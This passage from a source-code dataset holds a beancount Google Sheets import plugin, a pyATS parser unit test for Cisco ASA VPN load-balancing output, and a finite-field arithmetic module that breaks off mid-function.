if new_entries and new_entries_path:
from beancount.parser import printer
with new_entries_path.open("w") as stream:
printer.print_entries(new_entries, file=stream)
logger.info(f"Wrote {len(new_entries)} new account(s) to {new_entries_path}.")
return entries+new_entries, errors
remote_entries_plugin = safe_plugin(remote_entries)
ALIASES = {
'narration': ['description', 'notes', 'details', 'memo']
}
def clean_record(record: typing.Dict[str, str]):
new_record = {}
for k, v in record.items():
k = slugify.slugify(k.lower().strip())
v = str(v)
for field, names in ALIASES.items():
new_record.setdefault(field, '')
if k in names:
new_record[field] += ('. ' if new_record[field] else '') + v
k = None
break
if k == 'amount':
v = v.replace(',', '')
for s in STRIP_SYMOLS:
v = v.replace(s, '')
if v and not v[0].isdecimal() and not v[0]=='-':
v = v[1:]
try:
v = decimal.Decimal(v)
except decimal.InvalidOperation:
v = 0
if k:
new_record[k] = v
return new_record
def load_remote_account(
connection: gspread.Client,
errors: list,
account: str,
options: typing.Dict[str, str]
):
entries = []
document_name = options['document_name']
document_tab = options.get('document_tab', 0) or 0
default_currency = options['default_currency']
reverse_amount = options.get('reverse_amount', False)
if not document_name:
return
m = -1 if reverse_amount else 1
logger.info(f"Attempting to download entries for {account} from {document_name}.{document_tab}")
workbook = connection.open(document_name)
sheet = None
try:
document_tab = int(document_tab)
sheet = workbook.get_worksheet(document_tab)
except ValueError:
pass
if sheet is None:
sheet = workbook.worksheet(document_tab)
records = sheet.get_all_records()
import re
row = 0
for record in records:
row += 1
record = clean_record(record)
if 'date' not in record or not record['date']:
continue
if 'amount' not in record or not record['amount']:
continue
narration = record.pop('narration', None)
payee = record.pop('payee', None)
tagstr = record.pop('tags', '')
tags = set(re.split(r'\W+', tagstr)) if tagstr else set()
date = dateparser.parse(record.pop('date'))
if date:
date = datetime.date(year=date.year, month=date.month, day=date.day)
linkstr = record.pop('links', '')
links = set(re.split(r'\W+', linkstr)) if linkstr else set()
meta = {
'filename': str(options['entry_file']),
'lineno': 0,
'document-sheet-row': f"{document_name}/{document_tab}/{row+1}"
}
amount = decimal.Decimal(record.pop('amount')) * m
currency = record.pop('currency', default_currency)
entry_account = record.pop('account')
for k, v in record.items():
if v:
meta[k] = v
try:
if not entry_account:
errors.append(f"Skipping Record with Blank Account: {meta['document-sheet-row']}")
logger.warning(f"Skipping Record with Blank Account: {meta['document-sheet-row']}")
continue
entry = data.Transaction(
date=date,
narration=narration,
payee=payee,
tags=tags,
meta=meta,
links=links,
flag='*',
postings=[
data.Posting(
account=account,
units=data.Amount(amount, currency),
cost=None,
price=None,
flag='*',
meta={}
),
data.Posting(
account=entry_account,
units=data.Amount(-amount, currency),
cost=None,
price=None,
flag='*',
meta={}
)
]
)
entries.append(entry)
except Exception as exc:
logger.error(f"Error while parsing {record}", exc_info=exc)
errors.append(str(exc))
logger.info(f"Loaded {len(entries)} entries for {account} from {document_name}.{document_tab}")
return entries
| true
| true
|
790b256629c5649137035d014ee8ea6aa54c079f
| 4,072
|
py
|
Python
|
src/genie/libs/parser/asa/tests/test_show_vpn.py
|
filippohronsky/genieparser
|
85e4b7a8f101e5cd44d4d7116e0e7a1af13fe9df
|
[
"Apache-2.0"
] | 2
|
2021-01-27T03:37:39.000Z
|
2021-01-27T03:40:50.000Z
|
src/genie/libs/parser/asa/tests/test_show_vpn.py
|
filippohronsky/genieparser
|
85e4b7a8f101e5cd44d4d7116e0e7a1af13fe9df
|
[
"Apache-2.0"
] | 1
|
2020-08-01T00:23:31.000Z
|
2020-08-01T00:40:05.000Z
|
src/genie/libs/parser/asa/tests/test_show_vpn.py
|
filippohronsky/genieparser
|
85e4b7a8f101e5cd44d4d7116e0e7a1af13fe9df
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from unittest.mock import Mock
# PyATS
from pyats.topology import Device
from genie.metaparser.util.exceptions import SchemaEmptyParserError, \
SchemaMissingKeyError
from genie.libs.parser.asa.show_vpn import ShowVPNLoadBalancing
# ============================================
# unit test for 'show vpn load-balancing'
# =============================================
class TestShowVPNLoadBalancing(unittest.TestCase):
"""
unit test for show vpn load-balancing
"""
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'cluster_ip': 'cluster1',
'encryption': 'Enabled',
'failover': 'n/a',
'peers': {
1: {
'load_balancing_version': 4,
'model': 'ASA-VASA',
'pri': 5,
'public_ip': '10.246.0.1*',
'role': 'Master',
},
2: {
'load_balancing_version': 4,
'model': 'ASA-VASA',
'pri': 5,
'public_ip': '10.246.0.2',
'role': 'Backup',
},
},
'peers_count': 1,
'role': 'Master',
'status': 'Enabled',
'total_license_load': {
1: {
'anyconnect_premium_essentials': {
'limit': 250,
'load': 0,
'used': 0,
},
'other_vpn': {
'limit': 250,
'load': 1,
'used': 2,
},
'public_ip': '10.246.0.1*',
},
2: {
'anyconnect_premium_essentials': {
'limit': 0,
'load': 0,
'used': 0,
},
'other_vpn': {
'limit': 0,
'load': 0,
'used': 0,
},
'public_ip': '10.246.0.2',
},
},
}
golden_output = {'execute.return_value': '''
vASA-VPN-20#show vpn load-balancing
--------------------------------------------------------------------------
Status Role Failover Encryption Peers Cluster IP
--------------------------------------------------------------------------
Enabled Master n/a Enabled 1 cluster1
Peers:
--------------------------------------------------------------------------
Role Pri Model Load-Balancing Version Public IP
--------------------------------------------------------------------------
Master 5 ASA-VASA 4 10.246.0.1*
Backup 5 ASA-VASA 4 10.246.0.2
Total License Load:
--------------------------------------------------------------------------
AnyConnect Premium/Essentials Other VPN Public IP
----------------------------- ---------------------
Limit Used Load Limit Used Load
--------------------------------------------------------------------------
250 0 0% 250 2 1% 10.246.0.1*
0 0 0% 0 0 0% 10.246.0.2
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowVPNLoadBalancing(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
route_obj = ShowVPNLoadBalancing(device=self.device)
parsed_output = route_obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
if __name__ == '__main__':
unittest.main()
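# --- Illustrative sketch (added; not part of the original test module) ---
# The golden test above doubles as a usage example: on a live pyATS device the
# parser is driven exactly the way the Mock is. The helper below assumes an
# already-connected device object; testbed loading is omitted.
def parse_vpn_load_balancing(device):
    parsed = ShowVPNLoadBalancing(device=device).parse()
    return parsed['peers']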
| 35.408696
| 82
| 0.370088
|
import unittest
from unittest.mock import Mock
from pyats.topology import Device
from genie.metaparser.util.exceptions import SchemaEmptyParserError, \
SchemaMissingKeyError
from genie.libs.parser.asa.show_vpn import ShowVPNLoadBalancing
class TestShowVPNLoadBalancing(unittest.TestCase):
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
maxDiff = None
golden_parsed_output = {
'cluster_ip': 'cluster1',
'encryption': 'Enabled',
'failover': 'n/a',
'peers': {
1: {
'load_balancing_version': 4,
'model': 'ASA-VASA',
'pri': 5,
'public_ip': '10.246.0.1*',
'role': 'Master',
},
2: {
'load_balancing_version': 4,
'model': 'ASA-VASA',
'pri': 5,
'public_ip': '10.246.0.2',
'role': 'Backup',
},
},
'peers_count': 1,
'role': 'Master',
'status': 'Enabled',
'total_license_load': {
1: {
'anyconnect_premium_essentials': {
'limit': 250,
'load': 0,
'used': 0,
},
'other_vpn': {
'limit': 250,
'load': 1,
'used': 2,
},
'public_ip': '10.246.0.1*',
},
2: {
'anyconnect_premium_essentials': {
'limit': 0,
'load': 0,
'used': 0,
},
'other_vpn': {
'limit': 0,
'load': 0,
'used': 0,
},
'public_ip': '10.246.0.2',
},
},
}
golden_output = {'execute.return_value': '''
vASA-VPN-20#show vpn load-balancing
--------------------------------------------------------------------------
Status Role Failover Encryption Peers Cluster IP
--------------------------------------------------------------------------
Enabled Master n/a Enabled 1 cluster1
Peers:
--------------------------------------------------------------------------
Role Pri Model Load-Balancing Version Public IP
--------------------------------------------------------------------------
Master 5 ASA-VASA 4 10.246.0.1*
Backup 5 ASA-VASA 4 10.246.0.2
Total License Load:
--------------------------------------------------------------------------
AnyConnect Premium/Essentials Other VPN Public IP
----------------------------- ---------------------
Limit Used Load Limit Used Load
--------------------------------------------------------------------------
250 0 0% 250 2 1% 10.246.0.1*
0 0 0% 0 0 0% 10.246.0.2
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowVPNLoadBalancing(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
route_obj = ShowVPNLoadBalancing(device=self.device)
parsed_output = route_obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
if __name__ == '__main__':
unittest.main()
| true
| true
|
790b2616f583dbaa08f38fd927e913e89fb35cb7
| 34,961
|
py
|
Python
|
mathTools/field.py
|
ecuvelier/PPAT
|
63d4e6417729ba09ddec6c719e98ea67b788ab11
|
[
"Apache-2.0"
] | 3
|
2015-09-29T16:22:15.000Z
|
2020-03-30T23:34:51.000Z
|
mathTools/field.py
|
ecuvelier/PPAT
|
63d4e6417729ba09ddec6c719e98ea67b788ab11
|
[
"Apache-2.0"
] | null | null | null |
mathTools/field.py
|
ecuvelier/PPAT
|
63d4e6417729ba09ddec6c719e98ea67b788ab11
|
[
"Apache-2.0"
] | 2
|
2017-08-01T16:21:25.000Z
|
2020-03-30T23:34:53.000Z
|
# -*- coding: utf-8 -*-
"""
Created on 2013-2014
Author : Edouard Cuvelier
Affiliation : Université catholique de Louvain - ICTEAM - UCL Crypto Group
Address : Place du Levant 3, 1348 Louvain-la-Neuve, BELGIUM
email : firstname.lastname@uclouvain.be
"""
from numpy import *
import gmpy
from Crypto.Random.random import randint
import random as rd
import tools.fingexp as fingexp
import tools.utils as utils
class Field(fingexp.FingExp):
'Class for Field'
def __init__(self,p):
'''Defines the modulus p which must be a prime
'''
self.F = self
self.p = gmpy.mpz(p) # prime modulus
self.char = self.p # characteristic
self.q = self.p+1 # order+1 #TODO : correct?
assert gmpy.is_prime(p)
self.rep = None
self.g = None
'''
g is a random quadratic residue used to compute square roots and it is
initialized the first time a square root is computed
'''
self.to_fingerprint = ["p"]
self.to_export = {"fingerprint": [],"value": ["p"]}
super(Field, self).__init__()
def load(self, data, fingerprints):
self.p = utils.b64tompz(data["p"])
def one(self):
'unit element for multiplication'
return FieldElem(1, self)
def zero(self):
'unit element for addition'
return FieldElem(0,self)
def elem(self,x):
''' return an element of value x
'''
if isinstance(x,FieldElem):
assert x.F == self
return x
m = gmpy.mpz(1)
assert isinstance(x,int) or isinstance(x, long) or type(x)==type(m)
return FieldElem(x,self)
def random(self,low=1,high=None):
''' Return a random element of the Field
'''
if high == None :
high = int(self.p-1)
rand = randint(low,high)
return self.elem(rand)
def __eq__(self, other):
'testing if we are working in the same field'
try:
return (self.p == other.p)
except:
return False
def add(self, a, b):
'''
field operation: addition mod p
'''
return FieldElem((a.val + b.val) % self.p, self)
def sub(self, a, b):
'''
        field operation: subtraction mod p
'''
return FieldElem((a.val - b.val) % self.p, self)
def neg(self, a):
'''
field operation: opposite mod p
'''
return FieldElem((self.p - a.val ) % self.p, self)
def mul(self, a, b):
'''
field operation: multiplication of field elements
'''
"""
if isinstance(a,FieldElem) and isinstance(b, FieldElem) and not a.F == b.F :
raise Exception("multiplication between elements of different fields")
"""
if not isinstance(b,FieldElem) :
# Multiplication by a scalar
if b<0:
return self.smul(-a,-b)
return self.smul(a,b)
else:
return self.pmul(a,b)
def smul(self,a,b):
''' Return a*b where a or b is scalar
'''
if not isinstance(b,FieldElem):
# b is scalar
#return self.dbleAndAdd(a,a,b)
return FieldElem((gmpy.mpz(b)*a.val)%(self.p),self)
#return self.pmul(a,a.F.elem(b))
else :
# a is scalar
#return self.dbleAndAdd(b,b,a)
return self.smul(b,a)
def sm(self,b,a):
''' Quick multiplication between a field element a and a scalar b
'''
return FieldElem((gmpy.mpz(b)*a.val)%(self.p),self)
def pmul(self,a,b):
''' product between two field element in Fp
'''
return FieldElem((a.val * b.val) % self.p, self)
def dbleAndAdd(self,P,Pp,n):
'return n*P using double and add technique'
#print "dblaad"
if n == 0 :
return self.zero();
if n == 1 :
return P
elif n%2 == 1 :
Q = self.dbleAndAdd(P,Pp,(n-1)/2)
return P+Q+Q
elif n%2 == 0 :
Q = self.dbleAndAdd(P,Pp,n/2)
return Q+Q
def powop(self, a, b):
'return a**b'
m = gmpy.mpz(1)
#self.count = 0
'exponentiation by a scalar'
if not isinstance(b, int) and not isinstance(b, long) and not type(b)==type(m):
raise Exception("Exponentation by a non integer, long or mpz")
c = b
if c > self.char-1 or c<0:
c = b%(self.char-1)
#elif :
# return self.powop(a.invert(),(-c))
if c == 0 :
assert not a.val%self.char == 0
return self.one()
elif c == 1 :
return a
else :
return self.sqrtAndMultply(a,a, c)
#return FieldElem(pow(a.val,b,self.char))
def sqrtAndMultply(self,P,Pp,n):
'return P**n using square and multiply technique'
if n == 0 :
return self.one()
elif n == 1 :
return P
elif n%2 == 1 :
Q = self.sqrtAndMultply(P,Pp,(n-1)/2)
return P*self.square(Q)
elif n%2 == 0 :
Q = self.sqrtAndMultply(P,Pp,n/2)
return self.square(Q)
def square(self,a):
'''
This method returns the square of a
'''
return FieldElem(pow(a.val,2, self.p), self)
def invert(self,a):
assert not (a.val%self.p == 0) # Do not invert zero!
return FieldElem(gmpy.invert(a.val, self.p), self)
#def invertible(self,a):
#return not int(a.invert().val) == 0
def div(self,a,b):
assert not (b.val%self.p == 0) # Do not invert zero!
return FieldElem((a.val*self.invert(b).val % self.p),self)
def findnonresidue(self):
'''
find a random non quadratic residue in the Field F,
that is, find g that is not a square in F, this is
needed to compute square roots
'''
g=self.random()
while g.isquadres():
#print g, " is quad res in ", self
g = self.random()
return g
def __str__(self):
return "F_"+str(self.p)
def jsonable(self):
return {'type': 'FqField', 'p': self.p}
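# --- Illustrative sketch (added; not part of the original module) ---
# Minimal use of the prime-field API above; 101 is an arbitrary example prime.
def _field_demo():
    F = Field(101)
    a, b = F.elem(7), F.elem(45)
    c = a * b + b.invert()      # arithmetic mod 101 through the overloaded operators
    return c, a ** 5, a / b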
class FieldElem():
def __init__(self, val, F):
'''Creating a new field element.
'''
#assert isinstance(F,Field)
self.F = F
self.val = gmpy.mpz(val)
self.poly = polynom(self.F,[self])
#self.to_fingerprint = ["F", "val"]
#self.to_export = {"fingerprint": ["F"],
# "value": ["val"]}
#super(FieldElem, self).__init__()
def __eq__(self, other):
try:
return ((self.val%self.F.char) == (other.val%self.F.char) and self.F == other.F)
except:
return False
def __add__(self, other):
return self.F.add(self, other)
def __neg__(self):
return self.F.neg(self)
def __sub__(self, other):
return self.F.sub(self, other)
def __radd__(self, other):
return self.__add__(other)
def __mul__(self, other):
return self.F.mul(self, other)
def __rmul__(self, other):
return self.__mul__(other)
def __pow__(self, e):
return self.F.powop(self, e)
def __div__(self,other):
return self.F.div(self,other)
def __truediv__(self,other):
return self.F.div(self,other)
def __str__(self):
return str(self.val)
def iszero(self):
return self == self.F.zero()
def invert(self):
return self.F.invert(self)
def invertible(self):
return self.F.invertible(self)
def isquadres(self):
        ''' This method returns True if the element is a quadratic residue mod q
        different from zero;
        it returns False otherwise
'''
if (self+self.F.zero()).iszero() :
# case of element is zero
return False
else :
# If F's order is prime we use Euler's criterium
c = self**((self.F.q-1)/2) #TODO: Optimize this
return c==self.F.one()
def squareroot(self):
''' This method returns the positive square root of
an element of the field
using the Tonelli-Shanks algorithm
        Careful: if the element has no square root, the method does not
check this case and raises an error. Verification has to be done
before calling the method.
'''
g = self.F.g
if g == None :
g = self.F.findnonresidue()
self.F.g = g
q = self.F.q
s=0
t=self.F.q-1
while t%2==0:
s=s+1
t=t/2
# q-1 = (2**s)*t
e = 0
for i in range(2,s+1):
b = 2**(i-1)
b1 = b*2 # b1 = 2**i
c = ((self)*(g**(-e)))**((q-1)/b1)
if not c==self.F.one() :
e = e+b
h = self*(g**(-e))
b = (g**(e/2))*(h**((t+1)/2))
assert b**2 == self # FAILURE to find square root
return b
def fingerprint(self):
return fingexp.fingerprint(self.val)
def jsonable(self):
return {'type': 'FieldElem', 'F': self.F, 'val': self.val}
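# --- Illustrative sketch (added; not part of the original module) ---
# How the quadratic-residue test and the Tonelli-Shanks square root documented
# above are meant to be combined; 101 and 5 are arbitrary example values.
def _sqrt_demo():
    F = Field(101)
    x = F.elem(5)
    if x.isquadres():           # squareroot() must only be called on residues
        r = x.squareroot()
        assert r * r == x
        return r
    return None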
class ExtensionField(Field):
'''
This class defines extension fields and inherits field methods.
Depending on the degree of the extension field, we use
different algorithms to optimize the operations
'''
def __init__(self,F,irpoly,g=None,rep=None):
'''Define the base Field or extension Field and the irreducible polynomial
F is the base field on top of which the extension
field is built
irpoly is the irreducible polynomial used to build
the extension field as F/irpoly
g is a non quadratic residue used to compute square
roots, if it is set to None, computing a square root
will initialize g
rep is the representation of the root of irpoly
(note that letter 'A' is reserved for the Complex extension field)
'''
self.F = F
self.irpoly = irpoly
self.deg = len(irpoly.coef) # degree of the irreducible polynomial + 1
assert self.deg > 0
self.q = self.F.q**(self.deg-1) # order of the Field
self.tabular = self.table()
if rep == None :
self.rep = rd.choice(['B','C','D','E','F','G','H','J','K','L'])
#Choose a random representation letter
else :
self.rep = rep
self.char = F.char
self.primefield = gmpy.is_prime(self.char)
self.g = g # g is needed to compute square roots, it is a non quadratic residue
self.to_fingerprint = ["F","irpoly"]
self.to_export = {"fingerprint": [],"value": ["F","irpoly"]}
def one(self):
'unit element for multiplication'
One = [self.F.zero()]*(self.deg-1)
One[self.deg-2]= self.F.one()
return ExtensionFieldElem(self,polynom(self.F,One))
def zero(self):
'unit element for addition'
Zero = [self.F.zero()]*(self.deg-1)
return ExtensionFieldElem(self,polynom(self.F,Zero))
def unit(self):
''' root of the irreducible polynomial
e.g. return element 1*A+0 (or the complex value i) if the irpoly is X**2+1
'''
I = self.zero()
I.poly.coef[-2]=self.F.one()
return I
def elem(self,x):
''' Provided that x belongs to F, return an element of the extension field
of value x
'''
P = self.zero()
P.poly.coef[-1] = x
return P
def random(self):
''' Return a random element of the Extension Field
'''
polycoef = [0]*(self.deg-1)
for i in range(self.deg-1):
polycoef[i] = self.F.random()
poly = polynom(self.F,polycoef)
return ExtensionFieldElem(self,poly)
def __eq__(self, other):
'testing if we are working in the same extension field'
try:
return (self.F == other.F and self.irpoly == other.irpoly)
except:
return False
def add(self, a, b):
'''
        field operation: addition of polynomials > addition of coefficients in the appropriate field
'''
#assert a.F == b.F and a.F.F == self.F
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
polysum = [0]*a.deg
for i in range(a.deg):
polysum[i]=a.poly.coef[i]+b.poly.coef[i]
P = polynom(self.F,polysum)
return ExtensionFieldElem(self,P)
def sub(self, a, b):
'''
        field operation: subtraction of polynomials > subtraction of each coefficient in the appropriate field
'''
#assert a.F == b.F and a.F.F == self.F
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
c = self.neg(b)
return self.add(a,c)
def neg(self, a):
'''
field operation: opposite of a polynomial > opposite of each coefficient in appropriate field
'''
#assert a.F.F == self.F
ap = [0]*a.deg
for i in range(a.deg):
ap[i] = -a.poly.coef[i]
P = polynom(self.F,ap)
return ExtensionFieldElem(self,P)
def smul(self,a,b):
''' Return a*b where a or b is scalar
'''
if not isinstance(b,FieldElem):
# b is scalar
A = a.poly.coef
Pc = [0]*len(A)
for i in range(len(Pc)):
Pc[i] = A[i]*gmpy.mpz(b)
return ExtensionFieldElem(self,polynom(self.F,Pc))
else :
# a is scalar
return self.smul(b,a)
def pmul(self,a,b):
'''Multiplication between polynomials
'''
#assert a.F == b.F and a.F.F == self.F
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
# Simpler notations for reading
A = a.poly.coef
B = b.poly.coef
        k = self.deg-1 # degree of the extension field
if k == 2 and self.F.rep =='A':
# We are in the case that the extension field is Fp2
            # We assume here that the irreducible polynomial is X**2+1 (beta=-1)
# Complex multiplication
a0,a1,b0,b1 = A[0].val,A[1].val,B[0].val,B[1].val
p = self.char
v0 = a0*b0
v1 = a1*b1
c0 = ((a0+a1)*(b0+b1)-v0-v1)%p
c1 = (v1-v0)%p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
cp = polynom(self.F,[c0e,c1e])
C = ExtensionFieldElem(self,cp)
return C
elif k == 2:
# In this case, use Karatsuba multiplication algorithm
# notations
a0 = A[0]
a1 = A[1]
b0 = B[0]
b1 = B[1]
beta = -self.irpoly.coef[-1]
v0 = self.F.pmul(a0,b0)
v1 = self.F.pmul(a1,b1)
c0 = self.F.pmul((a0+a1),(b0+b1))-v0-v1 # coefficient of X
            c1 = v1 + self.F.pmul(v0,beta) # independent term
cp = polynom(self.F,[c0,c1])
C = ExtensionFieldElem(self,cp)
return C
elif k == 3:
# In this case, use Karatsuba multiplication algorithm
# notations
a0,a1,a2 = A
b0,b1,b2 = B
beta = -self.irpoly.coef[-1]
v0,v1,v2 = self.F.pmul(a0,b0), self.F.pmul(a1,b1), self.F.pmul(a2,b2)
c0 = self.F.pmul((a0+a2),(b0+b2))-v0+v1-v2 # coefficient of X**2
c1 = self.F.pmul((a2+a1),(b2+b1))-v2-v1+self.F.pmul(beta,v0) # coefficient of X
            c2 = v2+self.F.pmul(beta,(self.F.pmul((a1+a0),(b1+b0))-v1-v0)) # independent term
cp = polynom(self.F,[c0,c1,c2])
C = ExtensionFieldElem(self,cp)
return C
else :
prod = convolve(A,B)
return self.reduc2(prod) # return EProd % ired. polynomial
def square(self,a):
        ''' This algorithm returns the square of a in the field
using different methods if the degree of the extension
is 2,3 or more
'''
#print a.F
#print self
assert a.F == self
if not a.deg == self.deg-1 :
a = self.reduc(a)
#notations
A = a.poly.coef
k = self.deg-1 # degree of the extension
if k == 2 and self.F.rep == 'A':
# Using the complex multiplication
# We are in the case that the extension field is Fp2
            # We assume here that the irreducible polynomial is X**2+1 (beta=-1)
a1, a0 = A[0].val,A[1].val
p = self.char
v0 = a0*a1
c0 = ((a0+a1)*(a0-a1))%p
c1 = (v0+v0)%p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
cp = polynom(self.F,[c1e,c0e])
C = ExtensionFieldElem(self,cp)
return C
elif k == 2:
# Using the complex multiplication
a1, a0 = A
beta = -self.irpoly.coef[-1]
v0 = self.F.pmul(a0,a1)
c0 = self.F.pmul((a0+a1),(a0+self.F.pmul(a1,beta)))-v0-self.F.pmul(beta,v0)
c1 = v0+v0
cp = polynom(self.F,[c1,c0])
return ExtensionFieldElem(self,cp)
elif k == 3:
# Using Chung-Hasan Squaring2
a2,a1,a0 = A
#print a0
#print 'a0',a0.F, a0.F.deg-1
#print 'self',self.F, self.F.deg-1
assert a0.F == self.F
beta = -self.irpoly.coef[-1]
s0 = self.F.square(a0)
t1 = self.F.pmul(a0,a1)
s1 = t1+t1
s2 = self.F.square((a0-a1+a2))
t3 = a1*a2
s3 = t3+t3
s4 = self.F.square(a2)
c0 = s0 + self.F.pmul(beta,s3)
c1 = s1 + self.F.pmul(beta,s4)
c2 = s1 + s2 + s3 - s0 -s4
cp = polynom(self.F,[c2,c1,c0])
return ExtensionFieldElem(self,cp)
else :
return self.F.pmul(a,a)
def invert(self,a):
        ''' This method returns the inverse of a in the field
The inverse is computed by determining the Bezout coefficient using the
extended Euclide's algorithm or by specialized algorithms depending
on the degree of the extension (2 or 3)
'''
#assert self.invertible(a) #The element must be invertible
assert a.F == self
k = self.deg-1
if k == 2 and self.F.rep == 'A':
            # inversion in a quadratic (degree-2) extension of a prime field
            # We are in the case that the extension field is Fp2
            # We assume here that the irreducible polynomial is X**2+1 (mod=-1)
A = a.poly.coef
a1,a0 = A[0].val,A[1].val # a = a0+a1*i
p = self.char
norm = a0*a0+a1*a1
invnorm = gmpy.invert(norm,p)
c0 = (a0*invnorm) % p
c1 = (-a1*invnorm) % p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
invap = polynom(self.F,[c1e,c0e])
inva = ExtensionFieldElem(self,invap)
return inva
elif k == 2 :
            # inversion in a quadratic (degree-2) extension with a general irreducible polynomial
A = a.poly.coef
a1,a0 = A[0],A[1] # a = a0+a1*i
#print 'A',A
#print 'a1',a1
mod = self.irpoly.coef[-1] # i**2 = -mod
#a1b,a0b,modb = self.F.elem(a1), self.F.elem(a0),self.F.elem(mod)
#print 'a1b',a1b
#a1b2 = self.F.square(a1b)
a12 = self.F.square(a1)
#mid = self.F.pmul(a1b2,modb)
mid = self.F.pmul(a12,mod)
#norm = self.F.square(a0b)+mid
norm = self.F.square(a0)+mid
#invnorm = self.F.invert(a0**2+mod*a1**2)
#invnorm = self.F.invert(norm.poly.coef[-1])
invnorm = self.F.invert(norm)
c = self.F.pmul(a0,invnorm) # c = -a1/(a0**2+mod*a1**2)
d = -self.F.pmul(a1,invnorm)
invap = polynom(self.F,[d,c])
inva = ExtensionFieldElem(self,invap)
return inva
elif k == 3 :
            # inversion in a cubic (degree-3) extension
A = a.poly.coef
a2,a1,a0 = A[0],A[1],A[2]
mod = -self.irpoly.coef[-1]
z0 = self.F.zero()
z1 = self.F.one()
if a0 == z0:
#a0 = 0
if a1 == z0:
#a1 = 0
c0,c1,c2 = z0, self.F.invert(self.F.pmul(a2,mod)), z0
elif a2 == z0:
#a2 = 0
c0,c1,c2 = z0,z0,self.F.invert(self.F.pmul(a1,mod))
else :
#a1,a2 != 0
a22 = self.F.square(a2)
a12 = self.F.square(a1)
c2 = self.F.pmul(a12,self.F.invert((self.F.pmul(self.F.pmul(a22,a2),mod)+self.F.pmul(self.F.pmul(a12,a1),mod))))
c1 = self.F.pmul((z1-self.F.pmul(self.F.pmul(a1,c2),mod)),self.F.invert(self.F.pmul(a2,mod)))
c0 = self.F.pmul((-(self.F.pmul(self.F.pmul(a2,mod),c2))),self.F.invert(a1))
else :
#a0 != 0
if a1 == z0 and a2 == z0:
#a1 = 0 , a2 = 0
c0,c1,c2 = self.F.invert(a0),z0,z0
else :
a12 = self.F.pmul(a1,a2)
a12m = self.F.pmul(a12,mod)
a00 = self.F.square(a0)
abis = a00-a12m
if abis == z0:
#a0**2-(a1*a2*mod) = 0
a11 = self.F.square(a1)
a22 = self.F.square(a2)
a02 = self.F.pmul(a0,a2)
a01 = self.F.pmul(a0,a1)
c2 = self.F.pmul(-a,self.F.invert(self.F.pmul((a02-a11),mod)))
c1 = self.F.pmul(-a2,self.F.invert(a01-self.F.pmul(a22,mod)))
a1c2 = self.F.pmul(a1,c2)
a2c1 = self.F.pmul(a2,c1)
c0 = self.F.pmul((z1-self.F.pmul(a1c2+a2c1,mod)),self.F.invert(a0))
else :
#a0**2-(a1*a2*mod) != 0
if a1 == z0:
#a1 = 0
inva0 = self.F.invert(a0)
a02 = self.F.pmul(a0,a2)
a000 = self.F.pmul(a00,a0)
a22 = self.F.square(a2)
a222 = self.F.pmul(a22,a2)
mm = self.F.square(mod)
a222mm = self.F.pmul(a222,mm)
c2 = self.F.pmul(-a02,self.F.invert(a000+a222mm))
a02m = self.F.pmul(a02,mod)
a02mc2 = self.F.pmul(a02m,c2)
inva00 = self.F.square(inva0)
c1 = self.F.pmul(-a02mc2,inva00)
a2m = self.F.pmul(a2,mod)
a2mc1 = self.F.pmul(a2m,c1)
c0 = self.F.pmul(z1-a2mc1,inva0)
elif a2 == z0:
#a2 = 0
a11 = self.F.square(a1)
a111 = self.F.pmul(a11,a1)
a000 = self.F.pmul(a00,a0)
a111m = self.F.pmul(a111,mod)
inva0 = self.F.invert(a0)
c2 = self.F.pmul(a11,self.F.invert(a111m+a000))
a11m = self.F.pmul(a11,mod)
a11mc2 = self.F.pmul(a11m,c2)
inva00 = self.F.square(inva0)
c1 = self.F.pmul(a11mc2-a1,inva00)
a1m = self.F.pmul(a1,mod)
a1mc2 = self.F.pmul(a1m,c2)
c0 = self.F.pmul(z1-a1mc2,inva0)
else :
#a1,a2 != 0
a01 = self.F.pmul(a0,a1)
a22 = self.F.square(a2)
a22m = self.F.pmul(a22,mod)
a02 = self.F.pmul(a0,a2)
a11 = self.F.square(a1)
abus = a01-a22m
abos = self.F.pmul(a02-a11,mod)
invabis = self.F.invert(abis)
abb = self.F.pmul(abus,invabis)
abb1 = self.F.pmul(abb,a1)
abbbos = self.F.pmul(abb,abos)
c2 = self.F.pmul(abb1-a2,self.F.invert(abis-abbbos))
abosc2 = self.F.pmul(abos,c2)
c1 = self.F.pmul(-a1-abosc2,invabis)
a1c2 = self.F.pmul(a1,c2)
a2c1 = self.F.pmul(a2,c1)
c0 = self.F.pmul(z1-self.F.pmul(a1c2+a2c1,mod),self.F.invert(a0))
invap = polynom(self.F,[c2,c1,c0])
inva = ExtensionFieldElem(self,invap)
return inva
else :
            # inversion in an extension of degree other than 2 or 3
            # this inversion takes longer than the previous methods
            # it uses the extended Euclidean algorithm
P = ExtensionFieldElem(self,self.irpoly)
r,u,v = self.extendedeuclide(P,a)
n,d = r.poly.truedeg()
assert n == self.deg-2
c = r.poly.coef[len(r.poly.coef)-1].invert()
cp = polynom(self.F,[c])
ce = ExtensionFieldElem(self,cp)
return ce*v
def invertible(self,a):
''' Return True if a is invertible
'''
return not self.reduc(a)==self.zero()
def div(self,a,b):
return a*self.invert(b)
def eucldiv(self,a,b):
''' Return a/b and a%b
a and b are of length d-1 where d is the degree of the irreducible polynomial
'''
zero = self.F.zero()
izero = self.zero()
d = self.deg
assert not b.poly.iszero() # Do not divide by zero
if a.poly.iszero() :
return izero, izero # quotient is zero, remain is zero
elif a == b:
return self.one(), izero # quotient is one, remain is zero
#Notations
A = a.poly.coef
B = b.poly.coef
n, da = a.poly.truedeg() # position of first non zero elem of a and degree of a
m, db = b.poly.truedeg() # same for b
if da<db :
